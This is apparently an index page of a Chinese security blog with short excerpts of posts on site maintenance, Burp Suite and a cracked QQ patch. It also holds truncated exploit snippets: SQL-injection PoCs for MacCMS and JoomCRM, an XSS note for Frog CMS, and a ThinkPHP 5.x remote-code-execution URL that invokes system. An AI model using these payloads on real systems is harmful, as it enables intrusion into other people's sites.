[通知]博客数据回档

这件事也是这几天才发生的,因为忙于春节前的一些准备就没怎么关注博客这边,期间也收到过腾讯云那边的监控警报,但是没怎么注意,以为是网络波动…… 直到2月2号登上服务器才特么发现硬盘直接被写满了,好吧查了下问题是数据库日志高达...

Burp Suite 2.0测试版

更新历史 Burp Suite 2.0 beta现在可供专业版用户使用。 本次更次包含多项重大改动并添加了诸多全新功能具有许多新功能,包括: 1. 全新的爬虫工具,能够自动处理会话、检测应用程序状态的变化、抓取多次登录信息和不稳定的内容。 2....

解决WordPress无法登陆

自从博客域名从unhonker.com换为hedysx.com后就问题一直不断,2月11号就出了一个新问题:后台登录无反应,貌似进入死循环了。 一开始以为是缓存插件的问题,进入mysql直接停用相关插件后发现还是存在问题;嗯……百度吧,结果出...

WordPress开启验证码

   前阵子wordpress升级到了5.0版本,有些功能也跟着改变了,所以我这个小博客也就开启了注册功能+邮件通知,但是不得不说,一天到晚的被恶意爬行数据+恶意注册真的很烦!   每天登陆博客第一件事就是删除那些垃圾、恶意注册的用户,...

MacCms(苹果cms)注入漏洞

文章是转载一位表哥,全程分析这里 maccms8_mfb(苹果CMS视频分享程序 8.0 | 2017.09.27 发布的版本 Poc #! /usr/bin/python # -*- coding:utf-8 -*- #author:F0rmat import requests import time dict = "1234567890qwertyuiopa...

Joomla JoomCRM 1.1.1注入漏洞

# POC: # http://localhost/[PATH]/index.php?option=com_joomcrm&view=contacts&format=raw&loc=deal&tmpl=component&deal_id=[SQL] # GET /[PATH]/index.php?optio...

Frog CMS 0.9.5跨站漏洞

# Version:0.9.5 # CVE :CVE-2018-20448 # The parameter under /install/index.php is that the Database name has reflective XSS # 1 The Database name , username and password must be correct # 2 You can use the exp: <sc...

博客更换域名为hedysx.com

unhonker.com这个域名已经使用了大概7年的时间,关于更换新域名(hedysx.com)的事情考虑了1个多月才决定也算是代表一个新的开始吧。

QQ消息防撤回以及勋章墙补丁patch

软件转载自吾爱破解。 测试了一下,9.0.8版本是可以用,腾讯TIM暂时没测试。 百度网盘下载地址: https://pan.baidu.com/s/1hT2QTcbyIubK48eIOy6oyA 提取码:5f3c 解压密码:unhonker.com

thinkphp v5.x 远程代码执行漏洞poc

20181216补充: 1.执行phpinfo http://unhonker.com/public/index.php?s=/index/\think\app/invokefunction&amp;amp;amp;amp;amp;amp;function=call_user_func_array&amp;amp;amp;amp;amp;amp;vars[0]=system&amp;amp;amp...

wordpress优化日志

从本博客建立以来都没怎么搞过所谓的优化,一直都是裸着跑没加任何优化,但是!!!今年10月份搬家到浪潮云之后就发现有点不正常了。 博客使用的云服务器配置为2核cpu(E5)2G内存+50G SSD硬盘+5M宽带搭配前端腾讯云CDN+HTTP2; 环...

123...37

插入图片
返回顶部